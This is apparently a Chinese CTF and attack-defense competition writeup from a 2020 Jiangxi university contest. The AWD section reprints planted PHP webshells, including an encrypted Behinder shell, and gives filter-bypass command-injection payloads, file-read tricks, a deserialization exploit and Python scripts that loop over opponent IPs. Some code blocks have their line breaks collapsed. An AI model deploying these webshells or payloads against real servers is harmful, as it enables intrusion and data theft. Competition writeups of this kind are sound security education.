文章目录

  • CTF
    • Misc
      • Boring_exe
      • !_
      • ezAffine
      • Daylight
      • Blue
    • Web
      • Aurora website
      • web2(忘了叫啥名)
    • Crypto
      • EasyRSA
      • Interceptedtelegram
  • AWD
    • AWD1
    • AWD2

CTF

Misc

Boring_exe

!_

..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!...
..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.. ..... ..... .!.?.
..... ...!? !!.?. ..... ..?.? !.?.. ..... .!.?. ..... ..... ..!?! !.?!!
!!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?.. ..... ..... ..!.! !!!!! !!!.! !!!!. ?.... ...!? !!.?. .....
?.?!. ?..!. !!!!! !!!!. !!!!! !!!!. ?.... ..... !?!!. ?.... ....? .?!.?
....! .?.

Ook!密码
Ook!在线解密站:https://tool.bugku.com/brainfuck/

flag{Ookisok}

ezAffine

Daylight

感谢江西师范大学:WAXZ战队师傅提供本题的wp

n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1=35
e2=42

#python2
import  gmpy2
import  binascii
import  rsa
import math
from Crypto.Util import number
def exgcd(m, n, x, y):if n == 0:x = 1y = 0return (m, x, y)a1 = b = 1a = b1 = 0c = md = nq = int(c / d)r = c % dwhile r:c = dd = rt = a1a1 = aa = t - q * at = b1b1 = bb = t - q * bq = int(c / d)r = c % dx = ay = breturn d, x, y
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690e1=35
e2=42
e1=e1//7
e2=e2//7
n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519ans=exgcd(e1,e2,0,0)
s1=ans[1]
s2=ans[2]
m=(gmpy2.powmod(c1,s1,n)*gmpy2.powmod(c2,s2,n))%n
print gmpy2.iroot(m,7)[1]
while gmpy2.iroot(m,7)[1]==False:m=m+n
print m
print number.long_to_bytes(gmpy2.iroot(m,7)[0])


flag{1_0nly_see_d4ylight_d4ylight}

Blue

binwalk分析


foremost分离


zip伪加密

得到blindsql.pcapng

根据文件名称都知道这是sql盲注的流量包,所以直接过滤出http的包就行了
这是直接GET传参的,可以过滤的更仔细一点

http.request.method==GET


sql盲注分析,可以看到flag字段的第一位内容的ascii码为:102

>>> chr(102)
'f'

以此类推

flag{Gre4t_j0B_ON_This_Blue_sh4rk}

Web

Aurora website

上传图片,修改Content-type,根据提示,得知这里应该是条件竞争
使用burp intruder不断发包即可

web2(忘了叫啥名)

感谢江西理工大学:Stalker战队师傅的思路

Crypto

EasyRSA

flag{We1c0meCtf3r_elab}

Interceptedtelegram


摩斯密码

.- -.-. - .. ----- -. --.- ..- .. -.-. -.-

摩斯密码在线:http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx

flag{ACTI0NQUICK}

AWD

AWD1

awd1
├── about.php
├── admin
│   ├── footer.php
│   ├── header.php
│   ├── index.php
│   ├── logout.php
│   ├── upload
│   │   ├── 1596596144.png
│   │   ├── 1600179756.php
│   │   ├── 1600180813.exe
│   │   └── .library.php
│   └── upload.php
├── config.php
├── contact.php
├── css
│   ├── bootstrap.css
│   ├── chocolat.css
│   ├── flexslider.css
│   └── style.css
├── data
│   ├── flot-data.js
│   └── morris-data.js
├── footer.php
├── gulpfile.js
├── header.php
├── images
│   ├── 10.jpg
│   ├── 11.jpg
│   ├── 12.jpg
│   ├── 13.jpg
│   ├── 14.jpg
│   ├── 15.jpg
│   ├── 16.jpg
│   ├── 17.jpg
│   ├── 1.jpg
│   ├── 1.png
│   ├── 2.jpg
│   ├── 2.png
│   ├── 3.jpg
│   ├── 3.png
│   ├── 4.jpg
│   ├── 4.png
│   ├── 5.jpg
│   ├── 5.png
│   ├── 6.jpg
│   ├── 7.jpg
│   ├── 8.jpg
│   ├── 9.jpg
│   ├── banner1.jpg
│   ├── banner.jpg
│   ├── close.png
│   ├── co.png
│   ├── img-sp.png
│   ├── left.png
│   └── right.png
├── index.php
├── js
│   ├── bootstrap.js
│   ├── jquery-1.11.1.min.js
│   ├── jquery.chocolat.js
│   ├── jquery.flexslider.js
│   └── sb-admin-2.js
├── less
│   ├── mixins.less
│   ├── sb-admin-2.less
│   └── variables.less
├── login.php
├── search.php
├── ser.php
├── services.php
├── .shell.php
├── single.php
└── Wopop_files├── askgreen.png├── errorred.png├── google_jquery.min.js├── google_jquery-ui.min.js├── JQuery.cookie.js├── jquery.pagination.js├── jquery.ui.all.css├── loading1.gif├── loadingpn.gif├── login_bgx.gif├── login.js├── login_m_bg.png├── logo.png├── okgreen.png├── pagination.css├── site_bg.png├── style.css├── style_log.css├── userpanel.css└── webtemples.js8 directories, 85 files

利用点1

后门文件:awd1/.shell.php

<?php
$key = $_POST["cmd"];
if(isset($key)){$key = str_replace("flag","",$key);
}
eval($key);
?>

只是把flag字符给直接替换为空,利用方法很多

cmd=system("cat /flflagag.txt");
cmd=system("cat /fl''ag.txt");
cmd=system("cat /fla'g'.txt");
cmd=system("cat /fl${9}ag.txt");
cmd=system("cat /fl${IFS}ag.txt");
cmd=system("cat /fl\ag.txt");
cmd=system("cat /`echo 'ZmxhZy50eHQ=' | base64 -d`");
........


import requestsdef post_shell(ip_list):flag_path = '/.shell.php'#shell路径post_data = 'cmd=system("cat /flflagag.txt");'for i in ip_list:header_info = {'Host':i,'User-Agebt':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2','Accept-Encoding':'gzip, deflate','Content-Type':'application/x-www-form-urlencoded'}flag_url = 'http://'+i+flag_pathres = requests.post(url=flag_url,data=post_data,headers=header_info)print("[+]{0}:   {1}\n".format(i,res.text))if __name__ == '__main__':ip_list = \['172.20.102.101','172.20.103.101','172.20.104.101','172.20.105.101','172.20.106.101','172.20.107.101','172.20.108.101','172.20.109.101','172.20.110.101','172.20.111.101','172.20.112.101']post_shell(ip_list)

利用点2

任意文件读取:awd1/about.php

<?php$file=$_GET['file'];$file = str_replace("flag","",$file);$file = str_replace("../","",$file);$file = str_replace("..","",$file);$file = str_replace("file://","",$file);@print_r(file_get_contents($file));
?>

利用file://伪协议读绝对路径即可,AWD环境中flag的绝对路径都已知:/flag.txt

?file=fifile://le:///flflagag.txt
?file=php://filter/read=convert.base64-encode/resource=/flflagag.txt
......

利用点3

代码执行:awd1/config.php

//根目录
$basedir = '';
$shell=@$_POST['shell'];
if(preg_match('/(system|exec|shell|file_|call|open|preg|eval|assert|pass|include|require|key)/i', $shell)) {exit();
}
@eval($shell);

参数绕过代码执行

shell=(s.y.s.t.e.m)('cat /flag.txt');
shell="\x73\x79\x73\x74\x65\x6d"('cat /flag.txt');

利用点4

任意文件读取:awd1/concat.php

<?phpinclude 'header.php';$file_path = @$_GET['path'];if(file_exists($file_path)){$fp = fopen($file_path,"r");$str = fread($fp,filesize($file_path));echo $str = str_replace("\r\n","<br />",$str);}
?>

?path=/flag.txt
?path=/etc/passwd

利用点5

参数绕过命令执行:awd1/footer.php

<?php $shell=@$_POST['shell'];if(preg_match('/(cat|\ |more|flag)/i',$shell)&&str_replace(" ","",$shell)) {exit();}else{@system($shell);}
?>

shell=ca''t</fl''ag.txt
shell=`echo${IFS}Y2F0IC9mbGFnLnR4dAo=|base64${IFS}-d`
shell=a=ca;b=t;c=fl;d=ag;$a$b${IFS}/$c$d.txt

利用点6

注入:awd1/login.php

<?phpinclude_once('config.php');if (!empty($_POST['username'])) {$user=$_POST['username'];$pass=$_POST['password'];$query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";$data = mysqli_query($dbc,$query);   if (mysqli_num_rows($data) == 1) {$row = mysqli_fetch_array($data);$_SESSION['username'] = $row['user_name'];header('Location: ./admin/index.php');}else{echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';}}
?>




利用点7

注入:awd1/search.php

<?phpinclude 'header.php';include_once('config.php');$id=$_GET['id'];$check = eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $id);if($check){echo "Invalid strings!!!Please try agine!";
}else{$query = "SELECT * FROM news WHERE id=$id";$data = mysqli_query($dbc,$query);    $com = mysqli_fetch_array($data);
}
?>

eregi()函数可以使用%00截断,然后进行注入

ereg()eregi()函数在PHP 7中被弃用了,我这里的容器环境是PHP 7.3,测试时会返回致命错误


懒得测试了…

利用点8

反序列化代码执行:awd1/ser.php

<?php
class Smi1e
{protected $ClassObj;function __construct() {$this->ClassObj = new safe();}function __destruct() {$this->ClassObj->action();}
}class safe
{function action() {echo "Here is safe";}
}class unsafe
{private $data;function action() {eval($this->data);}
}unserialize(@$_GET['test']);

直接构造poc

<?php
class Smi1e
{protected $ClassObj;function __construct() {$this->ClassObj = new unsafe();}function __destruct() {$this->ClassObj->action();}
}
class unsafe
{private $data="system('cat /flag.txt');";function action() {eval($this->data);}
}$res = new Smi1e();
echo urlencode(serialize($res));
?>

?test=O%3A5%3A%22Smi1e%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A6%3A%22unsafe%22%3A1%3A%7Bs%3A12%3A%22%00unsafe%00data%22%3Bs%3A24%3A%22system%28%27cat+%2Fflag.txt%27%29%3B%22%3B%7D%7D


PS:吐槽一下出题人写的这个Smi1e类名,这Smi1e直接让我看成Smile。。。。。。。

利用点9

命令执行:awd1/admin/footer.php

<?php $shell=@$_POST['shell'];@system($shell);if($shell !=""){exit();}
?>

shell=cat /flag.txt

利用点10

直接送flag:awd1/admin/index.php

<!-- banner --><div class="banner1"></div>
<!-- //banner -->
<!-- single --><div class="single"><div class="container"><div class="single-page-artical"><div class="artical-content"><h3>flag:<?php print_r(file_get_contents('/flag'));?></h3><img class="img-responsive" src="../images/banner.jpg" alt=" " /><p></p></div>

不过我记得比赛的时候,flag的路径及文件名是:/flag.txt,所以这里比赛的时候是读不出来的

修改为/flag.txt即可读到flag

利用点11

任意文件上传:awd1/admin/upload.php

<html lang="zh-CN"><head><meta charset="utf-8">
<?php
include_once('../config.php');
if (isset($_SESSION['username'])) {include_once('header.php');$html_username = htmlspecialchars($_SESSION['username']);if(isset($_SESSION['error_info']) && $_SESSION['error_info'] != '') {echo $_SESSION['error_info'];$_SESSION['error_info'] = '';}
}
else {header('Location: ../login.php');
}
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{if($name!==""){$name1=substr($name,-4);if(is_uploaded_file($tmpName)){$time=time();$rootpath='./upload/'.$time.$name1;$file=fopen($tmpName, "r") or die('No such file!');$content=fread($file, filesize($tmpName));if(strstr($content,'fuck')){exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");}if(!move_uploaded_file($tmpName,$rootpath)){echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";exit;}}echo "上传成功:/upload/".$time.$name1;}
}
catch(Exception $e)
{echo "ERROR";
}
//
require('footer.php');?></html>




awd1/admin/upload/1600179756.php题目本身存放了一个命令执行后门

//1600179756.php
<?php system($_GET['cmd']);?>

利用点12

冰蝎马:awd1/admin/upload/.library.php

<?php
@error_reporting(0);
session_start();
if (isset($_GET['djicoieDJNCIVD']))
{$key=substr(md5(uniqid(rand())),16);$_SESSION['k']=$key;print $key;
}
else
{$key=$_SESSION['k'];$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __construct($p) {eval($p."");}}@new C($params);
}
?>

冰蝎马:https://www.t00ls.net/articles-56337.html

PS C:\Users\Administrator\Desktop> php -r "echo openssl_encrypt('|system(\'whoami\');','AES128','');"
sbD9xXGKpb2/BSn/O/gPNg0MrbwusxVXLEVTNRXyGcc=

AWD2

利用点1

文件读取直接送flag:ecshop/a.php

<?php
if(isset($_GET['shop'])){echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}
?>

PS C:\Users\Administrator> php -r "var_dump(base64_decode('L2ZsYWcudHh0'));"
string(9) "/flag.txt"

import requestsdef get_shell(ip_list):flag_path = '/a.php'pwd = 'shop'command = 'test'for i in ip_list:flag_url = 'http://'+i+flag_path+'/?'+pwd +'='+commandres = requests.get(url=flag_url)print("[+]{0}:   {1}\n".format(i,res.text))if __name__ == '__main__':ip_list = \['172.20.102.102','172.20.103.102','172.20.104.102','172.20.105.102','172.20.106.102','172.20.107.102','172.20.108.102','172.20.109.102','172.20.110.102','172.20.111.102','172.20.112.102']get_shell(ip_list)

利用点2

命令执行:ecshop/api.php

$hook = $_GET['s'];
if(isset($hook)){echo `$hook`;
}

?s=cat /flag.txt

利用点3

文件读取直接送flag:ecshop/check_file.php

if(isset($_GET['shop'])){echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}

利用点4

文件读取送flag:ecshop/config.php

f(isset($_GET['shop'])){echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?><?php
if(isset($_GET['shop'])){echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?>

不过这里flag.txt路径写错了,所以读不出来

PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZy50eHQ='));"
string(8) "flag.txt"

2020第三届江西省高校网络安全技能大赛 线下赛 CTFAWD Writeup相关推荐

  1. 2020 第三届江西省高校网络安全技能大赛 线上赛Writeup

    赛题类型 Misc Misc1-Hello Misc2-encrypt Misc3-jump Misc4-Burps Misc5-Trees Misc6-qrcode Misc7-blind Misc ...

  2. 第三届江西省高校网络安全技能大赛 部分wpCrypto的疑惑

    目录 前言 Misc1-Hello Misc2-encrypt Misc3-jump Misc4-Brups Misc5-Trees Misc6-qrcode Misc7-blind Misc8-mu ...

  3. 第四届江西省高校网络安全技能大赛 决赛 MISC

    第四届江西省高校网络安全技能大赛 线下赛MISC 拿到这图片用010editor打开,没看到什么有用的信息,然后用stegsolve打开图片. 在发现是LSB隐写,通道BGR里面有一个rar文件,sa ...

  4. 2020-第三届江西省高校网络安全技能大赛

    Misc-Hello 拿到一串字符串Q01JU0NDVEZ7V2VsY29tZV9DVEZlciF9 猜测是base64编码 解得CMISCCTF{Welcome_CTFer!} Misc-encry ...

  5. 第四届江西省高校网络安全技能大赛 复现 2021-09-30

    文章目录 crypto Yusa的密码学课堂-CBC第二课 Yusa的密码学课堂-CBC第三课 Misc 奇奇怪怪的编码 extractall crypto Yusa的密码学课堂-CBC第二课 题目: ...

  6. wp篇 AWD某一赛题全流程复现【江西省高校网络安全技能大赛】

    一,赛题概述 1概述 这道题目是PbootCMS V3.05,主页面如下. 2配置概述 采用tutum/lamp的镜像,Php 5.3+,其他扩展自行apt安装即可 3漏洞赛题 目前在dump下来的镜 ...

  7. 【阿尼亚不会CTF】第六届”蓝帽杯“全国大学生网络安全技能大赛—线上初赛部分writeup

    啊!!!蓝帽杯第一次加入取证模块呢,取证静态分,CTF动态分,这波是出道即C位,完全挤掉CTF,属于被迫做取证题惹~ 菜鸟阿尼亚会做的题不多,以后也要继续加油哦!!! (点名计算机取证出题人--某某某 ...

  8. 大家好,我是风溯,第三届百度大学生网络安全技能大赛个人第一

    白帽江湖人才辈出,传奇人物不胜枚举,这里只用实力说话,也许你没见过大佬真容,但ta的"传说"或许早有耳闻~ Xrayteam安全团队的xxxeyJ:"挖洞只是展现个人能力 ...

  9. 2020年全国职业院校技能大赛改革试点赛(中职组)

    为赛卷一,环境都是自己做的,仅作参考 网络安全竞赛试题 (一)(总分100分) 赛题说明 一.竞赛项目简介 "网络安全"竞赛共分A. 基础设施设置与安全加固:B. 网络安全事件响应 ...

最新文章

  1. 【干货书】图、网络与算法
  2. C++学习笔记-----在重载的赋值运算函数中调用拷贝构造函数
  3. 洛谷 - P3810 【模板】三维偏序(陌上花开)(CDQ分治套树状数组)
  4. css实现loading,CSS3 19种LOADING(加载)动效
  5. 前端学习(2856):简单秒杀系统学习之定时器循环显示
  6. text/html与text/plain的区别
  7. gblfy博客配色模板
  8. ajax then jquery,使用Jquery.ajax()。then()时无法.catch()错误
  9. Spring Boot的MyBatis注解:@MapperScan和@Mapper
  10. STL中的序列式容器——priority_queue(优先队列)
  11. Reinvent the Wheel Often
  12. Java案例实现用户登录
  13. 活动报名场地预约自定义表单小程序开发
  14. autosub字幕自动识别生成-最新windows配置方法
  15. bmc控制卡_BMC IPMI 管理远程服务器
  16. CentOS7内存清理脚本
  17. 1.3 Go语言上手-高质量编程与性能调优实战
  18. Scratch基础(四):演奏音乐-两只老虎
  19. pytorch基础(九)- 自定义数据集训练模型 和 迁移学习
  20. 日置HIOKI PW3198电能质量分析仪

热门文章

  1. 2023美赛思路2023美国大学生数学建模竞赛思路
  2. SpringBoot之整合Redis分析和实现-基于Spring Boot2.0.2版本
  3. 网格平滑基础算法总结
  4. 文件设置默认打开方式
  5. 35岁程序员,早到的中年危机
  6. Mybatis Could not find SQL statement to include with refid ‘xxx‘的问题
  7. 广州蓝景分享—Web前端开发培训机构如何选择
  8. 学C语言中输入输出函数,一篇就够了
  9. JavaScript基础语法(VS Code)
  10. python魔方方法__getitem__、__setitem__和__len__